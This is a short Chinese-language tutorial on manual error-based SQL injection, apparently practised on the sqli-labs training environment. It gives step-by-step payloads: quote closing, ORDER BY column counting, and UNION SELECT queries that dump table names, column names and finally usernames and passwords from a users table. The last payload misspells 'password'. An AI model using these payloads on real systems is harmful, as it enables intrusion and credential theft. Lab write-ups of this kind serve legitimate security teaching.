浅谈基于报错的手工注入

浅谈基于报错的手工注入

实验环境：sqlli

1.首先提示，请输入ID作为参数和数值

2.构建id参数后，返回正常

3.输入转义符 \ ，得到报错信息 "1\") LIMIT 0,1 （图片上引号内的为报错信息，所以这里去掉两个引号）

由此，我们可以得到大概的SQL语句为尝试闭合单引号，并注释之后的内容，输入1") --+

可以看到返回正常页面

4.在闭合后，输入order by 5 判断有几个字段，判断成功则会返回正常页面

5个字段报错，输入4，输入3 尝试

再输入order by 3 的时候，页面返回正常，说明有有三个字段

5.接下来使用union联合查询，查看哪些位置可以利用

首先将参数报错，id改为-1

其次构建语句 union select 1,2,3 （之前检测出3个字段）

返回2,3 说明2和3可以返回我们想要的值。

把2替换为database() 查看当前数据库，显示成功

6.接下来爆数据

首先是查找表名

输入

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 

链接表，显示表名，从mysql数据库总表中，筛选条件 表名等于当前数据库名

显示出当前数据库中的所有表

我们继续读取users表中的信息

输入

 union select 1,group_concat(column_name),3 from  information_schema.columns where table_name='users' --+

链接表，显示字段名 ，从mysql总表中，赛选出表名等于 users 的数据

接下来获取字段值，username和password的值

输入

union select 1,group_concat(username,0x3a,passowrd),3 from users --+

链接表 从用户表中读取数据，显示用户名密码用冒号进行分割

最后就得到了我们想要的信息。